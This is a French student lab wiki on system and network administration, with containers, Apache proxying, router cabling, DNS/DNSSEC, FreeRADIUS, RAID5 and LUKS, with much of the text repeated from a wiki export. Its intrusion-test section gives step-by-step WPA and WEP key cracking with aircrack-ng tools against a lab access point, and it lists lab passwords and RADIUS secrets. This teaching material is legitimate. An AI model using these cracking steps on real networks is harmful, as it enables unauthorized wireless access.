Après avoir configuré les différents serveurs Apache, il faut redémarrer les services sur chaque conteneur :<br />
<br />
$ service apache2 restart<br />
<br />
Pour utiliser apache en mode reverse proxy, on execute la commande :<br />
<br />
$ a2enmod proxy proxy_http<br />
<br />
11h25 : Serveurs Web unshare OK<br />
<br />
==Conteneurs Docker==<br />
<br />
Avant de lancer un conteneur, il faut modifier le fichier /etc/default/docker et commenter la ligne contenant iptables.<br />
Nous exécutons ensuite la commande :<br />
$ iptables-save<br />
Puis on redémarre le service Docker :<br />
$ service docker restart<br />
<br />
Sans les commandes réalisées précédemment, nous n'avions pas accès au réseau dans les conteneurs.<br />
<br />
Nous pouvons maintenant lancer un conteneur basé sur l'image officielle de debian :<br />
$ docker run -i -t debian<br />
<br />
Dans le conteneur, nous ajoutons le proxy de l'école :<br />
$ export http_proxy=http://proxy.polytech-lille.fr:3128/ <br />
<br />
Nous pouvons maintenant utiliser le gestionnaire de paquets apt afin d'installer apache2 et un éditeur de texte:<br />
$ apt-get update<br />
$ apt-get install apache2, nano, vim<br />
<br />
On sauvegarde ensuite le conteneur pour pouvoir le lancer plus tard en 3 exemplaires : <br />
<br />
$ docker commit [IDduConteneur] mehcret<br />
<br />
On créé un réseau Docker pour isoler nos conteneurs ensemble :<br />
<br />
$ docker network create --driver bridge mehcretnetwork<br />
<br />
Nous lançons ensuite 3 conteneurs sur le réseau précédemment créé en liant le port 80 du conteneur 3 (qui jouera le rôle de reverse proxy) au port 80 de la machine : <br />
<br />
$ docker run -i --network mehcretnetwork --name mehcret1 mehcret<br />
$ docker run -i --network mehcretnetwork --name mehcret2 mehcret<br />
$ docker run -i --network mehcretnetwork --name mehcret3 -p 80:80 mehcret<br />
<br />
Nous créons un nouveau sous domaine, dockerMehcret.plil.space pointant sur l'adresse IP de notre bridge en ajoutant un enregistrement de type A.<br />
Finalement, on configure les différents serveurs Apache comme nous l'avions fait dans la partie précédente.<br />
<br />
<br />
10h30 Serveurs Web (docker) OK<br />
<br />
<br />
=TP PRA=<br />
<br />
Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système nous aurons à installer une machine virtuelle Xen ainsi qu’à implanter un auto-commutateur téléphonique logiciel. Enfin la mise en place d’un réseau Wifi sécurisé et d’un site web sécurisé nous permettra de mettre en pratiques nos connaissances en la matière.<br />
<br />
==Tâche 5 : Câblage, connexion SR52, cordouan==<br />
<br />
===Connexion des routeurs au réseau de l'école===<br />
<br />
*'''Connexion SR52 - Routeur ISR4221 (E306)'''<br />
<br />
Dans le local SR52, on branche un câble du port 21 du routeur jusqu'au port K-16 du commutateur qui est relié à la prise murale qui se situe au dessus de cordouan en E306.<br />
<br />
Sur le routeur, on passe le port 21 sur le vlan 131 : <br />
<br />
config t<br />
int gi1/0/21<br />
switchport access vlan 131<br />
write<br />
<br />
En E306, on relie le port Gigabit 0/0/0 du routeur ISR4221 à la prise murale SR52.3-K16.<br />
<br />
Les LEDs passent alors au vert et on observe que le port 21 du routeur en SR52 est bien connecté :<br />
<br />
<br />
<gallery mode="nolines" widths=500px heights=400px><br />
<br />
File:TableVlansInterfacesSR52.jpg<br />
<br />
File:LedSR52.jpg<br />
<br />
<br />
</gallery><br />
<br />
*'''Connexion SR52 - Routeur Catalyst 3560 (E304)'''<br />
<br />
En E304, on remarque une fibre libre de code couleur Blanc-Noir, on retrouve cette même fibre connectée au routeur en SR52 sur une interface 10Gb et déjà configurée sur le bon Vlan. On branche alors cette fibre sur la première interface 10 Gb du routeur Catalyst 3560 en E304 en accord avec le groupe configurant ce routeur. Le routeur de la E304 est désormais connecté au réseau de l'école.<br />
<br />
<br />
===Connexion des commutateurs aux routeurs===<br />
<br />
*'''Connexion Routeur Catalyst 3560 - Commutateur 4006 (E304)'''<br />
<br />
Le routeur utilisé en E304 permettant la communication 10Gb, on relie le commutateur au routeur par 10 câbles afin de profiter au maximum des possibilités offertes par le Catalyst 3560. Le groupe s'occupant des commutateurs ayant configuré le commutateur de la E304 pour communiquer avec le routeur de cette même salle par les ports 4 à 13, on branche 10 câbles ethernet sur ces ports que l'on relie au routeur sur les ports 1 à 10.<br />
<br />
*'''Connexion Routeur ISR 4221 - Commutateur 6000 (E306)'''<br />
<br />
Contrairement au routeur utilisé en E304, le routeur en E306 ne permet une communication que Gb. Le commutateur sera donc relié au routeur par un seul câble. En accord avec le groupe configurant le routeur et celui configurant le commutateur, on relie ces derniers par un câble ethernet du port Gigabit 0/0/2 du routeur au port 14 du commutateur.<br />
<br />
*'''Connexion Routeur ISR 4221 (E306) - Commutateur 4006 (E304) '''<br />
<br />
La connexion entre le routeur et le commutateur doit se faire par fibre étant donné que ces deux appareils se trouvent dans deux salles différentes. On utilise pour cela la fibre disponible de code couleur (A COMPLETER). Du côté de la salle E306, on connecte la fibre à l'interface Gb 0/0/1. En E304, on connecte la fibre sur un port UPLINK du commutateur.<br />
<br />
*'''Connexion Commutateur 6000 (E306) - Routeur Catalyst 3560 (E304) '''<br />
<br />
La connexion au niveau du routeur ne pouvant se faire ici que par cuivre, nous devons utiliser un convertisseur fibre - cuivre. Pour interconnecter le commutateur 6000 au routeur Catalyst 3560, nous utilisons la fibre disponible de code couleur ORANGE. On connecte alors cette fibre sur le port (A COMPLETER) du commutateur de la E306. De l'autre côté, en E304, on connecte la fibre à un convertisseur puis le convertisseur au port 11 du routeur par un câble ethernet en accord avec le groupe configurant ce routeur.<br />
<br />
===Connexions au serveur Cordouan===<br />
<br />
Finalement, il faut connecter le serveur Cordouan à notre réseau afin d'avoir du réseau sur nos futures VM. <br />
<br />
*'''Connexion Commutateur 6000 (E306) - Serveur Cordouan '''<br />
<br />
Le commutateur 6000 se trouvant dans la même salle que le serveur Cordouan, on peut relier ces derniers par cuivre. On relie alors le port 17 au serveur Cordouan par câble ethernet.<br />
<br />
*'''Connexion Routeur Catalyst 3560 (E306) - Serveur Cordouan '''<br />
<br />
Ces deux appareils se trouvant dans deux salles différentes, la connexion ne peut se faire que par fibre. Cependant, nous ne disposons plus de convertisseur. Nous avons donc relié le serveur Cordouan au routeur de la E306 plutôt qu'au commutateur. Nous avons pour cela utilisé la fibre de code couleur BLEU. Nous connectons d'un côté la fibre au deuxième port Gigabit du routeur 3560, et de l'autre, la fibre au serveur Cordouan.<br />
<br />
===Connexion des commutateurs aux points d'accès===<br />
<br />
===Schéma résumant le câblage réalisé :===<br />
<br />
[[Fichier:ArchitectureMehCret.png|1200px]]<br />
<br />
== 2.Installation des systèmes d'exploitation==<br />
<br />
===Création de la machine virtuelle===<br />
<br />
Création d'une machine virtuelle sur cordouan.insecserv.deule.net :<br />
<br />
xen-create-image --hostname=hercule --ip=193.48.57.183 --netmask=255.255.255.224 --gateway=193.48.57.160 --dir=/usr/local/xen<br />
<br />
Il fois la machine créée, on ajoute le bridge dans la config hercule.cfg<br />
<br />
vif = ['ip=193.48.57.183 , mac=#####, bridge=StudentsInfo']<br />
xen create hercule.cfg<br />
<br />
On vérifie que la machine est bien créée en s'y connectant :<br />
<br />
xl console hercule<br />
<br />
Création des partitions logiques sur Cordouan pour la machine virtuelle :<br />
lvcreate -L 10G -n /dev/virtual/hercule-home -v<br />
lvcreate -L 10G -n /dev/virtual/hercule-var -v<br />
<br />
Modification du fichier de configuration de la machine virtuelle pour prendre en compte ces volumes créés. Ajout des lignes : <br />
'phy:/dev/virtual/hercule-home,xvdb1,w',<br />
'phy:/dev/virtual/hercule-var,xvdb2,w'<br />
<br />
On relance la VM.<br />
On formate les disques créés sur la machine :<br />
mkfs -t ext4 /dev/xvdb1<br />
mkfs -t ext4 /dev/xvdb2<br />
<br />
Afin de lier le home de notre vm au disque créé précédemment, on modifie le fichier /etc/fstab en y ajoutant la ligne suivante :<br />
/dev/xvdb1 /home ext4 defaults 0 2<br />
Puis on effectue le montage :<br />
mount -a <br />
<br />
Pour le var, il faut monter temporairement le disque pour ne pas occulter le repertoire : <br />
mount /dev/xvdb2 /mnt<br />
<br />
On déplace ensuite le contenu de var dans le point de montage précédemment créé :<br />
mv /var/* /mnt<br />
<br />
Finalement, on ajoute dans le fichier /etc/fstab la ligne suivante pour effectuer le montage permanent :<br />
/dev/xvdb2 /var ext4 defaults 0 2<br />
<br />
On applique les modifications :<br />
mount -a<br />
<br />
==4.Services internet==<br />
<br />
<br />
===4.2 Serveur DNS===<br />
<br />
Achat du domaine hercule.pw sur gandi.<br />
<br />
Installation de bind9: <br />
<br />
apt install bind9 bind9-host dnsutils<br />
<br />
Modification de la configuration de bind9 :<br />
On créé un fichier de configuration de zone db.hercule.space dans /etc/bind/ avec le contenu suivant : <br />
<br />
;<br />
; BIND data file for local loopback interface<br />
;<br />
$TTL 604800<br />
@ IN SOA ns.hercule.space. root.hercule.space (<br />
3 ; Serial<br />
604800 ; Refresh<br />
86400 ; Retry<br />
2419200 ; Expire<br />
604800 ) ; Negative Cache TTL<br />
;<br />
IN NS ns.hercule.space.<br />
IN NS ns6.gandi.net<br />
@ IN A 193.48.57.183<br />
ns IN A 193.48.57.183<br />
www IN A 193.48.57.183<br />
<br />
Ajout de notre zone DNS en modifiant le fichier /etc/bind/named.conf.local :<br />
<br />
zone "hercule.space" {<br />
type master;<br />
file "/etc/bind/db.hercule.space"; <br />
allow-transfer {217.70.177.40;};<br />
};<br />
<br />
La ligne 'allow-transfer' précise les adresses des serveurs esclaves Gandi.<br />
<br />
Redémarrage du serveur bind9 :<br />
service bind9 restart<br />
<br />
Ajout de glue records sur Gandi pour permettre l'association du serveur DNS créé avec notre adresse IP : <br />
name : ns.hercule.space<br />
IP address : 193.48.57.183<br />
<br />
Changement du nameserver principal sur Gandi (A FAIRE): <br />
DNS 1 : ns.hercule.space<br />
<br />
On laisse ceux de Gandi pour les deux serveurs esclaves.<br />
<br />
<br />
===4.4 DNSSEC===<br />
<br />
Dans un premier temps, on active DNSSEC en ajoutant dans le fichier /etc/bind/named la ligne :<br />
dnssec-enable yes;<br />
<br />
Création d'un répertoire de nom hercule.space.dnssec pour y générer les clefs<br />
<br />
Création de la clef asymétrique de signature de clefs de zone :<br />
<br />
dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE hercule.space<br />
:<br />
Création de la clef asymétrique de la zone pour signer les enregistrements :<br />
<br />
dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE hercule.space<br />
<br />
On renomme ces clef : <br />
hercule.space-ksk.key<br />
hercule.space-zsk.key<br />
<br />
Puis on les inclus dans le fichier /etc/bind/db.hercule.space<br />
$include /etc/bind/hercule.space.dnssec/hercule.space-ksk.key<br />
$include /etc/bind/hercule.space.dnssec/hercule.space-zsk.key<br />
<br />
On signe les enregistrements de la zone :<br />
dnssec-signzone -o hercule.space -k hercule.space-ksk ../db.hercule.space hercule.space-zsk<br />
<br />
On modifie le fichier named.conf.local pour utiliser la zone signée de suffixe .signed :<br />
file "/etc/bind/db.hercule.space.signed";<br />
<br />
On communique les parties publiques de la KSK et ZSK à Gandi dans l'onglet DNSSEC. On n'oublie pas également d'incrémenter le SERIAL dans le fichier db.hercule.space.<br />
<br />
===4.3 Serveur Apache===<br />
<br />
<br />
Création du dossier /var/www/www.hercule.pw<br />
<br />
*''' Certification SSL :'''<br />
<br />
Génération du Certificate Signing Request (CSR) pour Gandi sur la VM :<br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout hercule.pw.key -out hercule.pw.csr<br />
<br />
On copie le contenu de la clé générée sur Gandi. Pour valider la certification SSL, on choisi la méthode par DNS Record. On ajoute alors l'enregistrement CNAME proposé par Gandi dans notre configuration de zone sur la VM. Il faut maintenant patienter le temps du traitement. <br />
<br />
*'''Configuration Apache :'''<br />
<br />
Configuration du serveur web dans le fichier /etc/apache2/sites-available/hercule.space.conf<br />
<br />
<VirtualHost 193.48.57.183:443><br />
ServerName www.hercule.space<br />
ServerAlias hercule.space<br />
DocumentRoot /var/www/html/<br />
CustomLog /var/log/apache2/secure_acces.log combined<br />
<br />
SSLEngine on<br />
SSLCertificateFile /etc/ssl/certs/www.hercule.space.crt<br />
SSLCertificateKeyFile /etc/ssl/private/hercule.space.key<br />
SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem<br />
SSLVerifyClient None<br />
</VirtualHost><br />
<br />
<VirtualHost 193.48.57.183:80><br />
ServerName www.hercule.space<br />
ServerAlias hercule.space<br />
Redirect / https://www.hercule.space<br />
</VirtualHost><br />
<br />
<br />
Modification du fichier ports.conf pour que le serveur web écoute sur le port 443 :<br />
<br />
Listen 80 443<br />
<br />
On active enfin le module SSL, notre site, et on redémarre le service apache :<br />
a2enmod ssl<br />
a2ensite hercule.space.conf<br />
service apache2 restart<br />
<br />
===Serveur Freeradius===<br />
<br />
Installation de Freeradius sur la vm :<br />
apt-get install freeradius<br />
<br />
On ajoute ensuite un utilisateur au serveur freeradius. Pour cela, dans le fichier /etc/freeradius/3.0/users on ajoute : <br />
hercule Cleartext-Password := "glopglop"<br />
<br />
Il nous est demandé de configurer le serveur en PEAP-MSCHAPv2. Pour cela, on modifie les fichiers : <br />
<br />
- /etc/freeradius/3.0/mods-enabled/eap :<br />
default_eap_type = peap<br />
<br />
- /etc/freeradius/3.0/mods-enabled/mschap :<br />
use_mppe = yes<br />
require_encryption = yes<br />
require_strong = yes<br />
with_ntdomain_hack = yes<br />
<br />
<br />
On ajoute les points d'accès dans notre configuration de serveur (fichier : /etc/freeradius/3.0/clients.conf) :<br />
client 192.168.0.10/32 <br />
{<br />
secret = secretIMA5SC<br />
shortname = borneDivinite<br />
}<br />
<br />
client 192.168.0.11/32 <br />
{<br />
secret = secretIMA5SC<br />
shortname = borneDivinite<br />
}<br />
<br />
<br />
On met à jour la configuration : <br />
ldconfig<br />
<br />
Et enfin, nous lançons le service freeradius :<br />
$ service freeradius restart<br />
<br />
Nous passons ensuite à la modification de la configuration des points d'accès afin qu'ils prennent en compte notre serveur freeradius :<br />
<br />
enable<br />
<br />
conf t<br />
aaa new-model<br />
aaa authentication login eap_group17 group radius_group17<br />
aaa group server radius radius_group17<br />
server 193.48.57.183 auth-port 1812 acct-port 1813<br />
radius-server host 193.48.57.183 auth-port 1812 acct-port 1813 key secretIMA5SC<br />
end<br />
<br />
conf t<br />
dot11 ssid Hercule<br />
vlan 17<br />
authentication open eap eap_group17<br />
authentication network-eap eap_group17<br />
authentication key-management wpa<br />
Mbssid Guest-mode<br />
end<br />
<br />
conf t<br />
int dot11radio0<br />
Mbssid<br />
ssid Hercule<br />
encryption vlan 17 mode ciphers aes-ccm tkip<br />
end<br />
<br />
conf t<br />
int dot11radio0.17<br />
encapsulation dot1Q 17<br />
bridge-group 17<br />
end<br />
<br />
== 5. Tests d'intrusion ==<br />
===5.3 Crackage de clé WPA===<br />
<br />
Afin de lancer le crackage de clé WPA sur le point d'accès cracotte07, nous avons besoin du package aircrack-ng que nous installons. Nous affichons ainsi nos interfaces avec la commande :<br />
<br />
$ iwconfig<br />
<br />
Nous lançons alors airmon-ng avec notre interface wifi pour la mettre en mode moniteur:<br />
<br />
$ airmon-ng start wlp2s0<br />
<br />
Nous affichons ensuite tout les point d'accés environnants en utilisant la commande :<br />
<br />
$ airodump-ng wlp2s0mon<br />
<br />
Nous capturons des paquets provenants de cracotte07 que nous enregistrons dans un fichier :<br />
<br />
$ airodump-ng -c 9 --bssid 04:DA:d2:9C:50:56 -w ./path_to_folder/cracotte07 wlp2s0mon<br />
<br />
Une fois les fichiers générés, nous les transférons sur une ZABETH. Avant de lancer le craquage, nous devons générer un dictionnaire contenant toutes les combinaisons possibles de 8 chiffres. Pour cela, nous réalisons le script bash suivant :<br />
<br />
#!/bin/bash<br />
charset=({0..9})<br />
permute(){<br />
(($1 == 0)) && { echo "$2"; return; }<br />
for char in "${charset[@]}"<br />
do<br />
permute "$((${1} - 1 ))" "$2$char"<br />
done<br />
}<br />
permute "$1"<br />
<br />
Que nous laçons en exécutant :<br />
<br />
$ ./comb.sh 8 >> dictionnaire.txt<br />
<br />
Le crack est effectué en lançant la commande :<br />
<br />
$ aircrack-ng -a2 -b 04:DA:D2:9C:50:56 -w /path_to_file/dictionnaire.txt /path_to_file/*.cap<br />
<br />
Nous récupérons la clé après quelques heures de calcul :<br />
<br />
[[Fichier:Crack groupe7.png|600px]]<br />
<br />
===5.2 Cassage de clé WEP===<br />
<br />
<br />
Nous affichons ainsi nos interfaces avec la commande :<br />
<br />
$ iwconfig<br />
<br />
Nous lançons alors airmon-ng avec notre interface wifi pour la mettre en mode moniteur:<br />
<br />
$ airmon-ng start wlx40a5ef012c92<br />
<br />
Nous affichons ensuite tout les point d'accés environnants protégés en WEP en utilisant la commande :<br />
<br />
$ airodump-ng --encrypt wep wlan0mon<br />
<br />
Nous capturons des paquets provenants de cracotte07 que nous enregistrons dans un fichier :<br />
<br />
$ airodump-ng --channel 9 --bssid 04:DA:d2:9C:50:56 -w ./path_to_folder/cracotte07 wlan0mon<br />
<br />
En parallèle, on simule une connexion au point d'accès pour récupérer le handshake : <br />
$ aireplay-ng --fakeauth 30 -a 04:DA:D2:9C:50:56 wlan0mon<br />
<br />
On réalise le cassage : <br />
$ aircrack-ng ./path_to_folder/cracotte07.cap<br />
<br />
<br />
<br />
[[Fichier:cassagewep07.png|600px]]<br />
<br />
== 6. Réalisation ==<br />
<br />
===6.1 Sécurisation de données===<br />
<br />
Création de trois partitions LVM de 1Go sur Cordouan : <br />
lvcreate -L 1G -n /dev/virtual/hercule1 -v<br />
lvcreate -L 1G -n /dev/virtual/hercule2 -v<br />
lvcreate -L 1G -n /dev/virtual/hercule3 -v<br />
<br />
Modification du fichier de configuration de la machine virtuelle pour prendre en compte ces volumes créés. Ajout des lignes :<br />
<br />
'phy:/dev/virtual/hercule1,xvdc1,w',<br />
'phy:/dev/virtual/hercule2,xvdc2,w',<br />
'phy:/dev/virtual/hercule3,xvdc3,w'<br />
<br />
<br />
Installation du paquetage mdadm pour réaliser le RAID5 logiciel :<br />
apt-get install mdadm<br />
<br />
Création du RAID5 :<br />
mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdc1 /dev/xvdc2 /dev/xvdc3<br />
<br />
On formate le RAID créé : <br />
mkfs -t ext4 /dev/md0<br />
<br />
On monte le RAID dans notre VM : <br />
mount /dev/md0 /mnt <br />
<br />
On créé un fichier sur le RAID pour qu'il contienne des données. On ferme la VM et on lui retire la partition xvdc3 dans sa config.<br />
On relance la VM. Puis on essaye de remonter le RAID : <br />
En voulant remonter /dev/md0, un message nous indique que md0 n'existe pas. On lance alors la commande : <br />
cat /proc/mdstat<br />
Et on s'aperçoit que notre RAID est toujours présent, cette fois n'ayant plus que deux disques, mais apparaît sous le nom md127. On monte alors ce derrnier : <br />
mount /dev/md127 /mnt<br />
On retrouve alors bien le fichier créé initialement sur notre RAID. Lors de sa création, le fichier a été copié sur les 3 disques par le RAID. Ainsi, lorsque que nous avons supprimé un disque, cela n'a pas eu d'impact sur nos données.<br />
<br />
[[Fichier:Raidhercule.png|600px]]<br />
<br />
===6.2 Cryptage de données===<br />
<br />
Dans notre cas, nous n'utilisons pas une carte SD. Nous créons cependant une partition de 1 Giga sur cordouan sur laquelle on travaillera :<br />
<br />
$ lvcreate -L 1G -n /dev/virtual/hercule-crypt -v<br />
<br />
Une fois cette action réalisée, et la partition intégrée au fichier de configuration de la machine virtuelle sous forme de volume, de nom xvdd1, nous récupérons les paquets lvm2 et cryptsetup.<br />
Lorsque la récupération est terminée, nous sécurisons la partition de la manière suivante :<br />
<br />
$ cryptsetup luksFormat -c aes -h sha256 /dev/xvdd1<br />
<br />
Cette commande permet de formater la partiton au type LUKS et chiffre en AES avec un algorithme de hashage SHA256. Nous choisissons une phrase de chiffrement.<br />
<br />
Une fois la partition chiffrée, nous ouvrons un volume dans notre partition chiffrée :<br />
<br />
$ cryptsetup luksOpen /dev/xvdd1 home<br />
<br />
Nous la formatons en ext4 :<br />
<br />
$ mkfs -t ext4 /dev/mapper/home<br />
<br />
Enfin, nous montons la partition sous /mnt :<br />
<br />
$ mount -t ext4 /dev/mapper/home /mnt<br />
<br />
Nous y créons ensuite un fichier texte. La suite de cette partie, qui est d'échanger les cartes SD, n'est pas réalisable dans notre cas.</div>Mcreteurhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G7&diff=49130TP sysres IMA5sc 2018/2019 G72018-12-21T18:03:34Z<p>Mcreteur : /* 4.Services internet */</p>
<hr />
<div>= Wiki de TP =<br />
<br />
=TP GIS=<br />
<br />
==Conteneurs "à la main"==<br />
<br />
===Mise en place des conteneurs===<br />
<br />
*'''Création d'une partition''':<br />
dd if=/dev/zero of=/disk1 bs=1024K count=10240<br />
<br />
*'''Formatage''' : <br />
mtfs.etx4 /disk1<br />
<br />
*'''Montage de la partition''':<br />
mount /disk1 /mnt<br />
<br />
*'''Installation d'un système Debian''':<br />
debootstrap --include=apache2,nano stable /mnt <br />
<br />
*'''Préparation du montage du pseudo système de fichier /proc''':<br />
echo "proc /proc proc defaults 0 0" >> rootfs/etc/fstab<br />
<br />
*''' Démontage ''':<br />
umount /mnt<br />
<br />
*'''Copie en 2 exemplaires''':<br />
cp /disk1 /disk2<br />
cp /disk1 /disk3<br />
<br />
*'''Montage des 3 partitions :'''<br />
mount -oloop /disk1 /mnt/dsk1<br />
mount -oloop /disk2 /mnt/dsk2<br />
mount -oloop /disk3 /mnt/dsk3<br />
<br />
*'''Création du processus isolé par unshare''':<br />
unshare -p -f -m -n -u chroot /mnt/dsk1 /bin/sh -c "mount /proc ; /bin/bash"<br />
unshare -p -f -m -n -u chroot /mnt/dsk2 /bin/sh -c "mount /proc ; /bin/bash"<br />
unshare -p -f -m -n -u chroot /mnt/dsk3 /bin/sh -c "mount /proc ; /bin/bash"<br />
<br />
===Configuration réseau===<br />
*'''Création d'un commutateur logiciel''':<br />
ip link add mehcret2 type bridge<br />
<br />
*'''Création des interfaces virtuelles:'''<br />
ip link add vif1 type veth peer name eth0@vif1<br />
ip link add vif2 type veth peer name eth0@vif2<br />
ip link add vif3 type veth peer name eth0@vif3<br />
ip link add vif4 type veth peer name eth1@vif4<br />
<br />
*'''Ajout d'interfaces dans le commutateur :'''<br />
ip link set vif1 master mehcret2<br />
ip link set vif2 master mehcret2<br />
ip link set vif3 master mehcret2<br />
ip link set vif4 master bridge<br />
<br />
*'''Activation des interfaces''':<br />
ip link set eth0 up<br />
ip link set eth1 up<br />
<br />
*'''Récupération du PID des conteneurs :'''<br />
ps auxwww | grep unshare<br />
<br />
*'''Ajout des interfaces dans les conteneurs :'''<br />
ip link set eth0@vif2 netns /proc/19382/ns/net name eth0 (dsk1)<br />
ip link set eth0@vif1 netns /proc/19377/ns/net name eth0 (dsk2)<br />
ip link set eth1@vif4 netns /proc/19377/ns/net name eth1 (dsk2)<br />
ip link set eth0@vif3 netns /proc/19396/ns/net name eth0 (dsk3)<br />
<br />
*'''Activation du pont:''' <br />
ip address add dev mehcret2 192.168.60.0/24<br />
<br />
*'''Attribution des adresses:'''<br />
ip address add dev eth0 192.168.60.51/24 (dsk1)<br />
ip address add dev eth0 192.168.60.52/24 (dsk2)<br />
ip address add dev eth0 192.168.60.53/24 (dsk3)<br />
ip address add dev eth1 172.26.145.67/24 (dsk2)<br />
ip route add default via 172.26.145.254 (dsk2)<br />
<br />
*'''Activation :'''<br />
ip link set eth0 up<br />
ip link set vif1 up<br />
ip link set vif2 up<br />
ip link set vif3 up<br />
ip link set vif4 up<br />
ip link set mehcret2 up<br />
<br />
On peut désormais pinger entre les différents conteneurs.<br />
<br />
===Configuration des serveurs Web===<br />
<br />
Nous devons maintenant mettre en place les serveurs apache.<br />
<br />
Dans un premier temps, on créé les sous-domaines dont nous avons besoin. Dans les enregistrements DNS du domaine '''plil.space''', on ajoute les enregistrements suivants : <br />
<br />
- mndtMehcret A 172.26.145.67 (mndtMehcret sera le serveur mandataire. On le fait pointer sur l'adresse eth1 du conteneur 2)<br />
<br />
- web1Mehcret CNAME mndtMehcret (Serveur web du conteneur 1)<br />
<br />
- web2Mehcret CNAME mndtMhecret (Serveur web du conteneur 3)<br />
<br />
On configure ensuite les serveurs Apache. On attribue au premier serveur sur le conteneur 1 la configuration suivante dans le répertoire /etc/apache2/sites-available/ :<br />
<br />
<VirtualHost *:80><br />
ServerName web1mehcret.plil.space<br />
Options Indexes FollowSymLinks<br />
DocumentRoot /var/www/html/web1mehcret/<br />
</VirtualHost> <br />
<br />
On fait de même dans le conteneur 3 pour le serveur 2 en mettant les ServerName et Document root associés.<br />
On écrit ensuite une page HTML basique dans les dossiers /var/www/html/web1mehcret/ et /var/www/html/web2mehcret/ afin de reconnaître notre serveur web. <br />
<br />
Il faut maintenant mettre en place le reverse proxy. <br />
Dans le conteneur 2, connectée à la fois à eth0 et eth1, nous mettons en place la configuration suivante :<br />
<br />
<VirtualHost *:80><br />
ServerName mndtMehcret.plil.space<br />
ProxyPass "/web1" "http://192.168.60.51/"<br />
ProxyPassReverse "/web1" "http://192.168.60.51/"<br />
ProxyPass "/web2" "http://"http://192.168.60.53/"<br />
ProxyPassReverse "/web2" "http://192.168.60.53/"<br />
</VirtualHost><br />
<br />
Les lignes ProxyPass et ProxyPassReverse permettent alors la redirection sur les serveurs web du conteneur 1 et 3.<br />
<br />
Après avoir configuré les différents serveurs Apache, il faut redémarrer les services sur chaque conteneur :<br />
<br />
$ service apache2 restart<br />
<br />
Pour utiliser apache en mode reverse proxy, on execute la commande :<br />
<br />
$ a2enmod proxy proxy_http<br />
<br />
11h25 : Serveurs Web unshare OK<br />
<br />
==Conteneurs Docker==<br />
<br />
Avant de lancer un conteneur, il faut modifier le fichier /etc/default/docker et commenter la ligne contenant iptables.<br />
Nous exécutons ensuite la commande :<br />
$ iptables-save<br />
Puis on redémarre le service Docker :<br />
$ service docker restart<br />
<br />
Sans les commandes réalisées précédemment, nous n'avions pas accès au réseau dans les conteneurs.<br />
<br />
Nous pouvons maintenant lancer un conteneur basé sur l'image officielle de debian :<br />
$ docker run -i -t debian<br />
<br />
Dans le conteneur, nous ajoutons le proxy de l'école :<br />
$ export http_proxy=http://proxy.polytech-lille.fr:3128/ <br />
<br />
Nous pouvons maintenant utiliser le gestionnaire de paquets apt afin d'installer apache2 et un éditeur de texte:<br />
$ apt-get update<br />
$ apt-get install apache2, nano, vim<br />
<br />
On sauvegarde ensuite le conteneur pour pouvoir le lancer plus tard en 3 exemplaires : <br />
<br />
$ docker commit [IDduConteneur] mehcret<br />
<br />
On créé un réseau Docker pour isoler nos conteneurs ensemble :<br />
<br />
$ docker network create --driver bridge mehcretnetwork<br />
<br />
Nous lançons ensuite 3 conteneurs sur le réseau précédemment créé en liant le port 80 du conteneur 3 (qui jouera le rôle de reverse proxy) au port 80 de la machine : <br />
<br />
$ docker run -i --network mehcretnetwork --name mehcret1 mehcret<br />
$ docker run -i --network mehcretnetwork --name mehcret2 mehcret<br />
$ docker run -i --network mehcretnetwork --name mehcret3 -p 80:80 mehcret<br />
<br />
Nous créons un nouveau sous domaine, dockerMehcret.plil.space pointant sur l'adresse IP de notre bridge en ajoutant un enregistrement de type A.<br />
Finalement, on configure les différents serveurs Apache comme nous l'avions fait dans la partie précédente.<br />
<br />
<br />
10h30 Serveurs Web (docker) OK<br />
<br />
<br />
=TP PRA=<br />
<br />
Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système nous aurons à installer une machine virtuelle Xen ainsi qu’à implanter un auto-commutateur téléphonique logiciel. Enfin la mise en place d’un réseau Wifi sécurisé et d’un site web sécurisé nous permettra de mettre en pratiques nos connaissances en la matière.<br />
<br />
==Tâche 5 : Câblage, connexion SR52, cordouan==<br />
<br />
===Connexion des routeurs au réseau de l'école===<br />
<br />
*'''Connexion SR52 - Routeur ISR4221 (E306)'''<br />
<br />
Dans le local SR52, on branche un câble du port 21 du routeur jusqu'au port K-16 du commutateur qui est relié à la prise murale qui se situe au dessus de cordouan en E306.<br />
<br />
Sur le routeur, on passe le port 21 sur le vlan 131 : <br />
<br />
config t<br />
int gi1/0/21<br />
switchport access vlan 131<br />
write<br />
<br />
En E306, on relie le port Gigabit 0/0/0 du routeur ISR4221 à la prise murale SR52.3-K16.<br />
<br />
Les LEDs passent alors au vert et on observe que le port 21 du routeur en SR52 est bien connecté :<br />
<br />
<br />
<gallery mode="nolines" widths=500px heights=400px><br />
<br />
File:TableVlansInterfacesSR52.jpg<br />
<br />
File:LedSR52.jpg<br />
<br />
<br />
</gallery><br />
<br />
*'''Connexion SR52 - Routeur Catalyst 3560 (E304)'''<br />
<br />
En E304, on remarque une fibre libre de code couleur Blanc-Noir, on retrouve cette même fibre connectée au routeur en SR52 sur une interface 10Gb et déjà configurée sur le bon Vlan. On branche alors cette fibre sur la première interface 10 Gb du routeur Catalyst 3560 en E304 en accord avec le groupe configurant ce routeur. Le routeur de la E304 est désormais connecté au réseau de l'école.<br />
<br />
<br />
===Connexion des commutateurs aux routeurs===<br />
<br />
*'''Connexion Routeur Catalyst 3560 - Commutateur 4006 (E304)'''<br />
<br />
Le routeur utilisé en E304 permettant la communication 10Gb, on relie le commutateur au routeur par 10 câbles afin de profiter au maximum des possibilités offertes par le Catalyst 3560. Le groupe s'occupant des commutateurs ayant configuré le commutateur de la E304 pour communiquer avec le routeur de cette même salle par les ports 4 à 13, on branche 10 câbles ethernet sur ces ports que l'on relie au routeur sur les ports 1 à 10.<br />
<br />
*'''Connexion Routeur ISR 4221 - Commutateur 6000 (E306)'''<br />
<br />
